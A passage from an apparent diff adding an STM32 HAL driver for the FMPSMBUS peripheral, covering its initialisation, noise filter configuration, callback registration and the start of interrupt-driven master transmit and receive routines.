assert_param(IS_FMPSMBUS_OWN_ADDRESS2_MASK(hfmpsmbus->Init.OwnAddress2Masks)); + assert_param(IS_FMPSMBUS_GENERAL_CALL(hfmpsmbus->Init.GeneralCallMode)); + assert_param(IS_FMPSMBUS_NO_STRETCH(hfmpsmbus->Init.NoStretchMode)); + assert_param(IS_FMPSMBUS_PEC(hfmpsmbus->Init.PacketErrorCheckMode)); + assert_param(IS_FMPSMBUS_PERIPHERAL_MODE(hfmpsmbus->Init.PeripheralMode)); + + if (hfmpsmbus->State == HAL_FMPSMBUS_STATE_RESET) + { + /* Allocate lock resource and initialize it */ + hfmpsmbus->Lock = HAL_UNLOCKED; + +#if (USE_HAL_FMPSMBUS_REGISTER_CALLBACKS == 1) + hfmpsmbus->MasterTxCpltCallback = HAL_FMPSMBUS_MasterTxCpltCallback; /* Legacy weak MasterTxCpltCallback */ + hfmpsmbus->MasterRxCpltCallback = HAL_FMPSMBUS_MasterRxCpltCallback; /* Legacy weak MasterRxCpltCallback */ + hfmpsmbus->SlaveTxCpltCallback = HAL_FMPSMBUS_SlaveTxCpltCallback; /* Legacy weak SlaveTxCpltCallback */ + hfmpsmbus->SlaveRxCpltCallback = HAL_FMPSMBUS_SlaveRxCpltCallback; /* Legacy weak SlaveRxCpltCallback */ + hfmpsmbus->ListenCpltCallback = HAL_FMPSMBUS_ListenCpltCallback; /* Legacy weak ListenCpltCallback */ + hfmpsmbus->ErrorCallback = HAL_FMPSMBUS_ErrorCallback; /* Legacy weak ErrorCallback */ + hfmpsmbus->AddrCallback = HAL_FMPSMBUS_AddrCallback; /* Legacy weak AddrCallback */ + + if (hfmpsmbus->MspInitCallback == NULL) + { + hfmpsmbus->MspInitCallback = HAL_FMPSMBUS_MspInit; /* Legacy weak MspInit */ + } + + /* Init the low level hardware : GPIO, CLOCK, CORTEX...etc */ + hfmpsmbus->MspInitCallback(hfmpsmbus); +#else + /* Init the low level hardware : GPIO, CLOCK, NVIC */ + HAL_FMPSMBUS_MspInit(hfmpsmbus); +#endif /* USE_HAL_FMPSMBUS_REGISTER_CALLBACKS */ + } + + hfmpsmbus->State = HAL_FMPSMBUS_STATE_BUSY; + + /* Disable the selected FMPSMBUS peripheral */ + __HAL_FMPSMBUS_DISABLE(hfmpsmbus); + + /*---------------------------- FMPSMBUSx TIMINGR Configuration ------------------------*/ + /* Configure FMPSMBUSx: Frequency range */ + hfmpsmbus->Instance->TIMINGR = hfmpsmbus->Init.Timing & TIMING_CLEAR_MASK; + + /*---------------------------- FMPSMBUSx TIMEOUTR Configuration ------------------------*/ + /* Configure FMPSMBUSx: Bus Timeout */ + hfmpsmbus->Instance->TIMEOUTR &= ~FMPI2C_TIMEOUTR_TIMOUTEN; + hfmpsmbus->Instance->TIMEOUTR &= ~FMPI2C_TIMEOUTR_TEXTEN; + hfmpsmbus->Instance->TIMEOUTR = hfmpsmbus->Init.SMBusTimeout; + + /*---------------------------- FMPSMBUSx OAR1 Configuration -----------------------*/ + /* Configure FMPSMBUSx: Own Address1 and ack own address1 mode */ + hfmpsmbus->Instance->OAR1 &= ~FMPI2C_OAR1_OA1EN; + + if (hfmpsmbus->Init.OwnAddress1 != 0UL) + { + if (hfmpsmbus->Init.AddressingMode == FMPSMBUS_ADDRESSINGMODE_7BIT) + { + hfmpsmbus->Instance->OAR1 = (FMPI2C_OAR1_OA1EN | hfmpsmbus->Init.OwnAddress1); + } + else /* FMPSMBUS_ADDRESSINGMODE_10BIT */ + { + hfmpsmbus->Instance->OAR1 = (FMPI2C_OAR1_OA1EN | FMPI2C_OAR1_OA1MODE | hfmpsmbus->Init.OwnAddress1); + } + } + + /*---------------------------- FMPSMBUSx CR2 Configuration ------------------------*/ + /* Configure FMPSMBUSx: Addressing Master mode */ + if (hfmpsmbus->Init.AddressingMode == FMPSMBUS_ADDRESSINGMODE_10BIT) + { + hfmpsmbus->Instance->CR2 = (FMPI2C_CR2_ADD10); + } + /* Enable the AUTOEND by default, and enable NACK (should be disable only during Slave process) */ + /* AUTOEND and NACK bit will be manage during Transfer process */ + hfmpsmbus->Instance->CR2 |= (FMPI2C_CR2_AUTOEND | FMPI2C_CR2_NACK); + + /*---------------------------- FMPSMBUSx OAR2 Configuration -----------------------*/ + /* Configure FMPSMBUSx: Dual mode and Own Address2 */ + hfmpsmbus->Instance->OAR2 = (hfmpsmbus->Init.DualAddressMode | hfmpsmbus->Init.OwnAddress2 | \ + (hfmpsmbus->Init.OwnAddress2Masks << 8U)); + + /*---------------------------- FMPSMBUSx CR1 Configuration ------------------------*/ + /* Configure FMPSMBUSx: Generalcall and NoStretch mode */ + hfmpsmbus->Instance->CR1 = (hfmpsmbus->Init.GeneralCallMode | hfmpsmbus->Init.NoStretchMode | \ + hfmpsmbus->Init.PacketErrorCheckMode | hfmpsmbus->Init.PeripheralMode | \ + hfmpsmbus->Init.AnalogFilter); + + /* Enable Slave Byte Control only in case of Packet Error Check is enabled + and FMPSMBUS Peripheral is set in Slave mode */ + if ((hfmpsmbus->Init.PacketErrorCheckMode == FMPSMBUS_PEC_ENABLE) && \ + ((hfmpsmbus->Init.PeripheralMode == FMPSMBUS_PERIPHERAL_MODE_FMPSMBUS_SLAVE) || \ + (hfmpsmbus->Init.PeripheralMode == FMPSMBUS_PERIPHERAL_MODE_FMPSMBUS_SLAVE_ARP))) + { + hfmpsmbus->Instance->CR1 |= FMPI2C_CR1_SBC; + } + + /* Enable the selected FMPSMBUS peripheral */ + __HAL_FMPSMBUS_ENABLE(hfmpsmbus); + + hfmpsmbus->ErrorCode = HAL_FMPSMBUS_ERROR_NONE; + hfmpsmbus->PreviousState = HAL_FMPSMBUS_STATE_READY; + hfmpsmbus->State = HAL_FMPSMBUS_STATE_READY; + + return HAL_OK; +} + +/** + * @brief DeInitialize the FMPSMBUS peripheral. + * @param hfmpsmbus Pointer to a FMPSMBUS_HandleTypeDef structure that contains + * the configuration information for the specified FMPSMBUS. + * @retval HAL status + */ +HAL_StatusTypeDef HAL_FMPSMBUS_DeInit(FMPSMBUS_HandleTypeDef *hfmpsmbus) +{ + /* Check the FMPSMBUS handle allocation */ + if (hfmpsmbus == NULL) + { + return HAL_ERROR; + } + + /* Check the parameters */ + assert_param(IS_FMPSMBUS_ALL_INSTANCE(hfmpsmbus->Instance)); + + hfmpsmbus->State = HAL_FMPSMBUS_STATE_BUSY; + + /* Disable the FMPSMBUS Peripheral Clock */ + __HAL_FMPSMBUS_DISABLE(hfmpsmbus); + +#if (USE_HAL_FMPSMBUS_REGISTER_CALLBACKS == 1) + if (hfmpsmbus->MspDeInitCallback == NULL) + { + hfmpsmbus->MspDeInitCallback = HAL_FMPSMBUS_MspDeInit; /* Legacy weak MspDeInit */ + } + + /* DeInit the low level hardware: GPIO, CLOCK, NVIC */ + hfmpsmbus->MspDeInitCallback(hfmpsmbus); +#else + /* DeInit the low level hardware: GPIO, CLOCK, NVIC */ + HAL_FMPSMBUS_MspDeInit(hfmpsmbus); +#endif /* USE_HAL_FMPSMBUS_REGISTER_CALLBACKS */ + + hfmpsmbus->ErrorCode = HAL_FMPSMBUS_ERROR_NONE; + hfmpsmbus->PreviousState = HAL_FMPSMBUS_STATE_RESET; + hfmpsmbus->State = HAL_FMPSMBUS_STATE_RESET; + + /* Release Lock */ + __HAL_UNLOCK(hfmpsmbus); + + return HAL_OK; +} + +/** + * @brief Initialize the FMPSMBUS MSP. + * @param hfmpsmbus Pointer to a FMPSMBUS_HandleTypeDef structure that contains + * the configuration information for the specified FMPSMBUS. + * @retval None + */ +__weak void HAL_FMPSMBUS_MspInit(FMPSMBUS_HandleTypeDef *hfmpsmbus) +{ + /* Prevent unused argument(s) compilation warning */ + UNUSED(hfmpsmbus); + + /* NOTE : This function should not be modified, when the callback is needed, + the HAL_FMPSMBUS_MspInit could be implemented in the user file + */ +} + +/** + * @brief DeInitialize the FMPSMBUS MSP. + * @param hfmpsmbus Pointer to a FMPSMBUS_HandleTypeDef structure that contains + * the configuration information for the specified FMPSMBUS. + * @retval None + */ +__weak void HAL_FMPSMBUS_MspDeInit(FMPSMBUS_HandleTypeDef *hfmpsmbus) +{ + /* Prevent unused argument(s) compilation warning */ + UNUSED(hfmpsmbus); + + /* NOTE : This function should not be modified, when the callback is needed, + the HAL_FMPSMBUS_MspDeInit could be implemented in the user file + */ +} + +/** + * @brief Configure Analog noise filter. + * @param hfmpsmbus Pointer to a FMPSMBUS_HandleTypeDef structure that contains + * the configuration information for the specified FMPSMBUS. + * @param AnalogFilter This parameter can be one of the following values: + * @arg @ref FMPSMBUS_ANALOGFILTER_ENABLE + * @arg @ref FMPSMBUS_ANALOGFILTER_DISABLE + * @retval HAL status + */ +HAL_StatusTypeDef HAL_FMPSMBUS_ConfigAnalogFilter(FMPSMBUS_HandleTypeDef *hfmpsmbus, uint32_t AnalogFilter) +{ + /* Check the parameters */ + assert_param(IS_FMPSMBUS_ALL_INSTANCE(hfmpsmbus->Instance)); + assert_param(IS_FMPSMBUS_ANALOG_FILTER(AnalogFilter)); + + if (hfmpsmbus->State == HAL_FMPSMBUS_STATE_READY) + { + /* Process Locked */ + __HAL_LOCK(hfmpsmbus); + + hfmpsmbus->State = HAL_FMPSMBUS_STATE_BUSY; + + /* Disable the selected FMPSMBUS peripheral */ + __HAL_FMPSMBUS_DISABLE(hfmpsmbus); + + /* Reset ANOFF bit */ + hfmpsmbus->Instance->CR1 &= ~(FMPI2C_CR1_ANFOFF); + + /* Set analog filter bit*/ + hfmpsmbus->Instance->CR1 |= AnalogFilter; + + __HAL_FMPSMBUS_ENABLE(hfmpsmbus); + + hfmpsmbus->State = HAL_FMPSMBUS_STATE_READY; + + /* Process Unlocked */ + __HAL_UNLOCK(hfmpsmbus); + + return HAL_OK; + } + else + { + return HAL_BUSY; + } +} + +/** + * @brief Configure Digital noise filter. + * @param hfmpsmbus Pointer to a FMPSMBUS_HandleTypeDef structure that contains + * the configuration information for the specified FMPSMBUS. + * @param DigitalFilter Coefficient of digital noise filter between Min_Data=0x00 and Max_Data=0x0F. + * @retval HAL status + */ +HAL_StatusTypeDef HAL_FMPSMBUS_ConfigDigitalFilter(FMPSMBUS_HandleTypeDef *hfmpsmbus, uint32_t DigitalFilter) +{ + uint32_t tmpreg; + + /* Check the parameters */ + assert_param(IS_FMPSMBUS_ALL_INSTANCE(hfmpsmbus->Instance)); + assert_param(IS_FMPSMBUS_DIGITAL_FILTER(DigitalFilter)); + + if (hfmpsmbus->State == HAL_FMPSMBUS_STATE_READY) + { + /* Process Locked */ + __HAL_LOCK(hfmpsmbus); + + hfmpsmbus->State = HAL_FMPSMBUS_STATE_BUSY; + + /* Disable the selected FMPSMBUS peripheral */ + __HAL_FMPSMBUS_DISABLE(hfmpsmbus); + + /* Get the old register value */ + tmpreg = hfmpsmbus->Instance->CR1; + + /* Reset FMPI2C DNF bits [11:8] */ + tmpreg &= ~(FMPI2C_CR1_DNF); + + /* Set FMPI2Cx DNF coefficient */ + tmpreg |= DigitalFilter << FMPI2C_CR1_DNF_Pos; + + /* Store the new register value */ + hfmpsmbus->Instance->CR1 = tmpreg; + + __HAL_FMPSMBUS_ENABLE(hfmpsmbus); + + hfmpsmbus->State = HAL_FMPSMBUS_STATE_READY; + + /* Process Unlocked */ + __HAL_UNLOCK(hfmpsmbus); + + return HAL_OK; + } + else + { + return HAL_BUSY; + } +} + +#if (USE_HAL_FMPSMBUS_REGISTER_CALLBACKS == 1) +/** + * @brief Register a User FMPSMBUS Callback + * To be used instead of the weak predefined callback + * @param hfmpsmbus Pointer to a FMPSMBUS_HandleTypeDef structure that contains + * the configuration information for the specified FMPSMBUS. + * @param CallbackID ID of the callback to be registered + * This parameter can be one of the following values: + * @arg @ref HAL_FMPSMBUS_MASTER_TX_COMPLETE_CB_ID Master Tx Transfer completed callback ID + * @arg @ref HAL_FMPSMBUS_MASTER_RX_COMPLETE_CB_ID Master Rx Transfer completed callback ID + * @arg @ref HAL_FMPSMBUS_SLAVE_TX_COMPLETE_CB_ID Slave Tx Transfer completed callback ID + * @arg @ref HAL_FMPSMBUS_SLAVE_RX_COMPLETE_CB_ID Slave Rx Transfer completed callback ID + * @arg @ref HAL_FMPSMBUS_LISTEN_COMPLETE_CB_ID Listen Complete callback ID + * @arg @ref HAL_FMPSMBUS_ERROR_CB_ID Error callback ID + * @arg @ref HAL_FMPSMBUS_MSPINIT_CB_ID MspInit callback ID + * @arg @ref HAL_FMPSMBUS_MSPDEINIT_CB_ID MspDeInit callback ID + * @param pCallback pointer to the Callback function + * @retval HAL status + */ +HAL_StatusTypeDef HAL_FMPSMBUS_RegisterCallback(FMPSMBUS_HandleTypeDef *hfmpsmbus, + HAL_FMPSMBUS_CallbackIDTypeDef CallbackID, + pFMPSMBUS_CallbackTypeDef pCallback) +{ + HAL_StatusTypeDef status = HAL_OK; + + if (pCallback == NULL) + { + /* Update the error code */ + hfmpsmbus->ErrorCode |= HAL_FMPSMBUS_ERROR_INVALID_CALLBACK; + + return HAL_ERROR; + } + + /* Process locked */ + __HAL_LOCK(hfmpsmbus); + + if (HAL_FMPSMBUS_STATE_READY == hfmpsmbus->State) + { + switch (CallbackID) + { + case HAL_FMPSMBUS_MASTER_TX_COMPLETE_CB_ID : + hfmpsmbus->MasterTxCpltCallback = pCallback; + break; + + case HAL_FMPSMBUS_MASTER_RX_COMPLETE_CB_ID : + hfmpsmbus->MasterRxCpltCallback = pCallback; + break; + + case HAL_FMPSMBUS_SLAVE_TX_COMPLETE_CB_ID : + hfmpsmbus->SlaveTxCpltCallback = pCallback; + break; + + case HAL_FMPSMBUS_SLAVE_RX_COMPLETE_CB_ID : + hfmpsmbus->SlaveRxCpltCallback = pCallback; + break; + + case HAL_FMPSMBUS_LISTEN_COMPLETE_CB_ID : + hfmpsmbus->ListenCpltCallback = pCallback; + break; + + case HAL_FMPSMBUS_ERROR_CB_ID : + hfmpsmbus->ErrorCallback = pCallback; + break; + + case HAL_FMPSMBUS_MSPINIT_CB_ID : + hfmpsmbus->MspInitCallback = pCallback; + break; + + case HAL_FMPSMBUS_MSPDEINIT_CB_ID : + hfmpsmbus->MspDeInitCallback = pCallback; + break; + + default : + /* Update the error code */ + hfmpsmbus->ErrorCode |= HAL_FMPSMBUS_ERROR_INVALID_CALLBACK; + + /* Return error status */ + status = HAL_ERROR; + break; + } + } + else if (HAL_FMPSMBUS_STATE_RESET == hfmpsmbus->State) + { + switch (CallbackID) + { + case HAL_FMPSMBUS_MSPINIT_CB_ID : + hfmpsmbus->MspInitCallback = pCallback; + break; + + case HAL_FMPSMBUS_MSPDEINIT_CB_ID : + hfmpsmbus->MspDeInitCallback = pCallback; + break; + + default : + /* Update the error code */ + hfmpsmbus->ErrorCode |= HAL_FMPSMBUS_ERROR_INVALID_CALLBACK; + + /* Return error status */ + status = HAL_ERROR; + break; + } + } + else + { + /* Update the error code */ + hfmpsmbus->ErrorCode |= HAL_FMPSMBUS_ERROR_INVALID_CALLBACK; + + /* Return error status */ + status = HAL_ERROR; + } + + /* Release Lock */ + __HAL_UNLOCK(hfmpsmbus); + return status; +} + +/** + * @brief Unregister an FMPSMBUS Callback + * FMPSMBUS callback is redirected to the weak predefined callback + * @param hfmpsmbus Pointer to a FMPSMBUS_HandleTypeDef structure that contains + * the configuration information for the specified FMPSMBUS. + * @param CallbackID ID of the callback to be unregistered + * This parameter can be one of the following values: + * This parameter can be one of the following values: + * @arg @ref HAL_FMPSMBUS_MASTER_TX_COMPLETE_CB_ID Master Tx Transfer completed callback ID + * @arg @ref HAL_FMPSMBUS_MASTER_RX_COMPLETE_CB_ID Master Rx Transfer completed callback ID + * @arg @ref HAL_FMPSMBUS_SLAVE_TX_COMPLETE_CB_ID Slave Tx Transfer completed callback ID + * @arg @ref HAL_FMPSMBUS_SLAVE_RX_COMPLETE_CB_ID Slave Rx Transfer completed callback ID + * @arg @ref HAL_FMPSMBUS_LISTEN_COMPLETE_CB_ID Listen Complete callback ID + * @arg @ref HAL_FMPSMBUS_ERROR_CB_ID Error callback ID + * @arg @ref HAL_FMPSMBUS_MSPINIT_CB_ID MspInit callback ID + * @arg @ref HAL_FMPSMBUS_MSPDEINIT_CB_ID MspDeInit callback ID + * @retval HAL status + */ +HAL_StatusTypeDef HAL_FMPSMBUS_UnRegisterCallback(FMPSMBUS_HandleTypeDef *hfmpsmbus, + HAL_FMPSMBUS_CallbackIDTypeDef CallbackID) +{ + HAL_StatusTypeDef status = HAL_OK; + + /* Process locked */ + __HAL_LOCK(hfmpsmbus); + + if (HAL_FMPSMBUS_STATE_READY == hfmpsmbus->State) + { + switch (CallbackID) + { + case HAL_FMPSMBUS_MASTER_TX_COMPLETE_CB_ID : + hfmpsmbus->MasterTxCpltCallback = HAL_FMPSMBUS_MasterTxCpltCallback; /* Legacy weak MasterTxCpltCallback */ + break; + + case HAL_FMPSMBUS_MASTER_RX_COMPLETE_CB_ID : + hfmpsmbus->MasterRxCpltCallback = HAL_FMPSMBUS_MasterRxCpltCallback; /* Legacy weak MasterRxCpltCallback */ + break; + + case HAL_FMPSMBUS_SLAVE_TX_COMPLETE_CB_ID : + hfmpsmbus->SlaveTxCpltCallback = HAL_FMPSMBUS_SlaveTxCpltCallback; /* Legacy weak SlaveTxCpltCallback */ + break; + + case HAL_FMPSMBUS_SLAVE_RX_COMPLETE_CB_ID : + hfmpsmbus->SlaveRxCpltCallback = HAL_FMPSMBUS_SlaveRxCpltCallback; /* Legacy weak SlaveRxCpltCallback */ + break; + + case HAL_FMPSMBUS_LISTEN_COMPLETE_CB_ID : + hfmpsmbus->ListenCpltCallback = HAL_FMPSMBUS_ListenCpltCallback; /* Legacy weak ListenCpltCallback */ + break; + + case HAL_FMPSMBUS_ERROR_CB_ID : + hfmpsmbus->ErrorCallback = HAL_FMPSMBUS_ErrorCallback; /* Legacy weak ErrorCallback */ + break; + + case HAL_FMPSMBUS_MSPINIT_CB_ID : + hfmpsmbus->MspInitCallback = HAL_FMPSMBUS_MspInit; /* Legacy weak MspInit */ + break; + + case HAL_FMPSMBUS_MSPDEINIT_CB_ID : + hfmpsmbus->MspDeInitCallback = HAL_FMPSMBUS_MspDeInit; /* Legacy weak MspDeInit */ + break; + + default : + /* Update the error code */ + hfmpsmbus->ErrorCode |= HAL_FMPSMBUS_ERROR_INVALID_CALLBACK; + + /* Return error status */ + status = HAL_ERROR; + break; + } + } + else if (HAL_FMPSMBUS_STATE_RESET == hfmpsmbus->State) + { + switch (CallbackID) + { + case HAL_FMPSMBUS_MSPINIT_CB_ID : + hfmpsmbus->MspInitCallback = HAL_FMPSMBUS_MspInit; /* Legacy weak MspInit */ + break; + + case HAL_FMPSMBUS_MSPDEINIT_CB_ID : + hfmpsmbus->MspDeInitCallback = HAL_FMPSMBUS_MspDeInit; /* Legacy weak MspDeInit */ + break; + + default : + /* Update the error code */ + hfmpsmbus->ErrorCode |= HAL_FMPSMBUS_ERROR_INVALID_CALLBACK; + + /* Return error status */ + status = HAL_ERROR; + break; + } + } + else + { + /* Update the error code */ + hfmpsmbus->ErrorCode |= HAL_FMPSMBUS_ERROR_INVALID_CALLBACK; + + /* Return error status */ + status = HAL_ERROR; + } + + /* Release Lock */ + __HAL_UNLOCK(hfmpsmbus); + return status; +} + +/** + * @brief Register the Slave Address Match FMPSMBUS Callback + * To be used instead of the weak HAL_FMPSMBUS_AddrCallback() predefined callback + * @param hfmpsmbus Pointer to a FMPSMBUS_HandleTypeDef structure that contains + * the configuration information for the specified FMPSMBUS. + * @param pCallback pointer to the Address Match Callback function + * @retval HAL status + */ +HAL_StatusTypeDef HAL_FMPSMBUS_RegisterAddrCallback(FMPSMBUS_HandleTypeDef *hfmpsmbus, + pFMPSMBUS_AddrCallbackTypeDef pCallback) +{ + HAL_StatusTypeDef status = HAL_OK; + + if (pCallback == NULL) + { + /* Update the error code */ + hfmpsmbus->ErrorCode |= HAL_FMPSMBUS_ERROR_INVALID_CALLBACK; + + return HAL_ERROR; + } + /* Process locked */ + __HAL_LOCK(hfmpsmbus); + + if (HAL_FMPSMBUS_STATE_READY == hfmpsmbus->State) + { + hfmpsmbus->AddrCallback = pCallback; + } + else + { + /* Update the error code */ + hfmpsmbus->ErrorCode |= HAL_FMPSMBUS_ERROR_INVALID_CALLBACK; + + /* Return error status */ + status = HAL_ERROR; + } + + /* Release Lock */ + __HAL_UNLOCK(hfmpsmbus); + return status; +} + +/** + * @brief UnRegister the Slave Address Match FMPSMBUS Callback + * Info Ready FMPSMBUS Callback is redirected to the weak HAL_FMPSMBUS_AddrCallback() predefined callback + * @param hfmpsmbus Pointer to a FMPSMBUS_HandleTypeDef structure that contains + * the configuration information for the specified FMPSMBUS. + * @retval HAL status + */ +HAL_StatusTypeDef HAL_FMPSMBUS_UnRegisterAddrCallback(FMPSMBUS_HandleTypeDef *hfmpsmbus) +{ + HAL_StatusTypeDef status = HAL_OK; + + /* Process locked */ + __HAL_LOCK(hfmpsmbus); + + if (HAL_FMPSMBUS_STATE_READY == hfmpsmbus->State) + { + hfmpsmbus->AddrCallback = HAL_FMPSMBUS_AddrCallback; /* Legacy weak AddrCallback */ + } + else + { + /* Update the error code */ + hfmpsmbus->ErrorCode |= HAL_FMPSMBUS_ERROR_INVALID_CALLBACK; + + /* Return error status */ + status = HAL_ERROR; + } + + /* Release Lock */ + __HAL_UNLOCK(hfmpsmbus); + return status; +} + +#endif /* USE_HAL_FMPSMBUS_REGISTER_CALLBACKS */ + +/** + * @} + */ + +/** @defgroup FMPSMBUS_Exported_Functions_Group2 Input and Output operation functions + * @brief Data transfers functions + * +@verbatim + =============================================================================== + ##### IO operation functions ##### + =============================================================================== + [..] + This subsection provides a set of functions allowing to manage the FMPSMBUS data + transfers. + + (#) Blocking mode function to check if device is ready for usage is : + (++) HAL_FMPSMBUS_IsDeviceReady() + + (#) There is only one mode of transfer: + (++) Non-Blocking mode : The communication is performed using Interrupts. + These functions return the status of the transfer startup. + The end of the data processing will be indicated through the + dedicated FMPSMBUS IRQ when using Interrupt mode. + + (#) Non-Blocking mode functions with Interrupt are : + (++) HAL_FMPSMBUS_Master_Transmit_IT() + (++) HAL_FMPSMBUS_Master_Receive_IT() + (++) HAL_FMPSMBUS_Slave_Transmit_IT() + (++) HAL_FMPSMBUS_Slave_Receive_IT() + (++) HAL_FMPSMBUS_EnableListen_IT() or alias HAL_FMPSMBUS_EnableListen_IT() + (++) HAL_FMPSMBUS_DisableListen_IT() + (++) HAL_FMPSMBUS_EnableAlert_IT() + (++) HAL_FMPSMBUS_DisableAlert_IT() + + (#) A set of Transfer Complete Callbacks are provided in non-Blocking mode: + (++) HAL_FMPSMBUS_MasterTxCpltCallback() + (++) HAL_FMPSMBUS_MasterRxCpltCallback() + (++) HAL_FMPSMBUS_SlaveTxCpltCallback() + (++) HAL_FMPSMBUS_SlaveRxCpltCallback() + (++) HAL_FMPSMBUS_AddrCallback() + (++) HAL_FMPSMBUS_ListenCpltCallback() + (++) HAL_FMPSMBUS_ErrorCallback() + +@endverbatim + * @{ + */ + +/** + * @brief Transmit in master/host FMPSMBUS mode an amount of data in non-blocking mode with Interrupt. + * @param hfmpsmbus Pointer to a FMPSMBUS_HandleTypeDef structure that contains + * the configuration information for the specified FMPSMBUS. + * @param DevAddress Target device address: The device 7 bits address value + * in datasheet must be shifted to the left before calling the interface + * @param pData Pointer to data buffer + * @param Size Amount of data to be sent + * @param XferOptions Options of Transfer, value of @ref FMPSMBUS_XferOptions_definition + * @retval HAL status + */ +HAL_StatusTypeDef HAL_FMPSMBUS_Master_Transmit_IT(FMPSMBUS_HandleTypeDef *hfmpsmbus, uint16_t DevAddress, + uint8_t *pData, uint16_t Size, uint32_t XferOptions) +{ + uint32_t tmp; + + /* Check the parameters */ + assert_param(IS_FMPSMBUS_TRANSFER_OPTIONS_REQUEST(XferOptions)); + + if (hfmpsmbus->State == HAL_FMPSMBUS_STATE_READY) + { + /* Process Locked */ + __HAL_LOCK(hfmpsmbus); + + hfmpsmbus->State = HAL_FMPSMBUS_STATE_MASTER_BUSY_TX; + hfmpsmbus->ErrorCode = HAL_FMPSMBUS_ERROR_NONE; + /* Prepare transfer parameters */ + hfmpsmbus->pBuffPtr = pData; + hfmpsmbus->XferCount = Size; + hfmpsmbus->XferOptions = XferOptions; + + /* In case of Quick command, remove autoend mode */ + /* Manage the stop generation by software */ + if (hfmpsmbus->pBuffPtr == NULL) + { + hfmpsmbus->XferOptions &= ~FMPSMBUS_AUTOEND_MODE; + } + + if (Size > MAX_NBYTE_SIZE) + { + hfmpsmbus->XferSize = MAX_NBYTE_SIZE; + } + else + { + hfmpsmbus->XferSize = Size; + } + + /* Send Slave Address */ + /* Set NBYTES to write and reload if size > MAX_NBYTE_SIZE and generate RESTART */ + if ((hfmpsmbus->XferSize < hfmpsmbus->XferCount) && (hfmpsmbus->XferSize == MAX_NBYTE_SIZE)) + { + FMPSMBUS_TransferConfig(hfmpsmbus, DevAddress, (uint8_t)hfmpsmbus->XferSize, + FMPSMBUS_RELOAD_MODE | (hfmpsmbus->XferOptions & FMPSMBUS_SENDPEC_MODE), + FMPSMBUS_GENERATE_START_WRITE); + } + else + { + /* If transfer direction not change, do not generate Restart Condition */ + /* Mean Previous state is same as current state */ + + /* Store current volatile XferOptions, misra rule */ + tmp = hfmpsmbus->XferOptions; + + if ((hfmpsmbus->PreviousState == HAL_FMPSMBUS_STATE_MASTER_BUSY_TX) && \ + (IS_FMPSMBUS_TRANSFER_OTHER_OPTIONS_REQUEST(tmp) == 0)) + { + FMPSMBUS_TransferConfig(hfmpsmbus, DevAddress, (uint8_t)hfmpsmbus->XferSize, hfmpsmbus->XferOptions, + FMPSMBUS_NO_STARTSTOP); + } + /* Else transfer direction change, so generate Restart with new transfer direction */ + else + { + /* Convert OTHER_xxx XferOptions if any */ + FMPSMBUS_ConvertOtherXferOptions(hfmpsmbus); + + /* Handle Transfer */ + FMPSMBUS_TransferConfig(hfmpsmbus, DevAddress, (uint8_t)hfmpsmbus->XferSize, + hfmpsmbus->XferOptions, + FMPSMBUS_GENERATE_START_WRITE); + } + + /* If PEC mode is enable, size to transmit manage by SW part should be Size-1 byte, corresponding to PEC byte */ + /* PEC byte is automatically sent by HW block, no need to manage it in Transmit process */ + if (FMPSMBUS_GET_PEC_MODE(hfmpsmbus) != 0UL) + { + hfmpsmbus->XferSize--; + hfmpsmbus->XferCount--; + } + } + + /* Process Unlocked */ + __HAL_UNLOCK(hfmpsmbus); + + /* Note : The FMPSMBUS interrupts must be enabled after unlocking current process + to avoid the risk of FMPSMBUS interrupt handle execution before current + process unlock */ + FMPSMBUS_Enable_IRQ(hfmpsmbus, FMPSMBUS_IT_TX); + + return HAL_OK; + } + else + { + return HAL_BUSY; + } +} + +/** + * @brief Receive in master/host FMPSMBUS mode an amount of data in non-blocking mode with Interrupt. + * @param hfmpsmbus Pointer to a FMPSMBUS_HandleTypeDef structure that contains + * the configuration information for the specified FMPSMBUS. + * @param DevAddress Target device address: The device 7 bits address value + * in datasheet must be shifted to the left before calling the interface + * @param pData Pointer to data buffer + * @param Size Amount of data to be sent + * @param XferOptions Options of Transfer, value of @ref FMPSMBUS_XferOptions_definition + * @retval HAL status + */ +HAL_StatusTypeDef HAL_FMPSMBUS_Master_Receive_IT(FMPSMBUS_HandleTypeDef *hfmpsmbus, uint16_t DevAddress, uint8_t *pData, + uint16_t Size, uint32_t XferOptions) +{ + uint32_t tmp; + + /* Check the parameters */ + assert_param(IS_FMPSMBUS_TRANSFER_OPTIONS_REQUEST(XferOptions)); + + if (hfmpsmbus->State == HAL_FMPSMBUS_STATE_READY) + { + /* Process Locked */ + __HAL_LOCK(hfmpsmbus); + + hfmpsmbus->State = HAL_FMPSMBUS_STATE_MASTER_BUSY_RX; + hfmpsmbus->ErrorCode = HAL_FMPSMBUS_ERROR_NONE; + + /* Prepare transfer parameters */ + hfmpsmbus->pBuffPtr = pData; + hfmpsmbus->XferCount = Size; + hfmpsmbus->XferOptions = XferOptions; + + /* In case of Quick command, remove autoend mode */ + /* Manage the stop generation by software */ + if (hfmpsmbus->pBuffPtr == NULL) + { + hfmpsmbus->XferOptions &= ~FMPSMBUS_AUTOEND_MODE; + } + + if (Size > MAX_NBYTE_SIZE) + { + hfmpsmbus->XferSize = MAX_NBYTE_SIZE; + } + else + { + hfmpsmbus->XferSize = Size; + } + + /* Send Slave Address */ + /* Set NBYTES to write and reload if size > MAX_NBYTE_SIZE and generate RESTART */ + if ((hfmpsmbus->XferSize < hfmpsmbus->XferCount) && (hfmpsmbus->XferSize == MAX_NBYTE_SIZE)) + { + FMPSMBUS_TransferConfig(hfmpsmbus, DevAddress, (uint8_t)hfmpsmbus->XferSize, + FMPSMBUS_RELOAD_MODE | (hfmpsmbus->XferOptions & FMPSMBUS_SENDPEC_MODE), + FMPSMBUS_GENERATE_START_READ); + } + else + { + /* If transfer direction not change, do not generate Restart Condition */ + /* Mean Previous state is same as current state */ + + /* Store current volatile XferOptions, Misra rule */ + tmp = hfmpsmbus->XferOptions; + + if ((hfmpsmbus->PreviousState == HAL_FMPSMBUS_STATE_MASTER_BUSY_RX) && \ + (IS_FMPSMBUS_TRANSFER_OTHER_OPTIONS_REQUEST(tmp) == 0)) + { + FMPSMBUS_TransferConfig(hfmpsmbus, DevAddress, (uint8_t)hfmpsmbus->XferSize, hfmpsmbus->XferOptions, + FMPSMBUS_NO_STARTSTOP); + } + /* Else transfer direction change, so generate Restart with new transfer direction */ + else + { + /* Convert OTHER_xxx XferOptions if any */ + FMPSMBUS_ConvertOtherXferOptions(hfmpsmbus); + + /* Handle Transfer */ + FMPSMBUS_TransferConfig(hfmpsmbus, DevAddress, (uint8_t)hfmpsmbus->XferSize, + hfmpsmbus->XferOptions, + 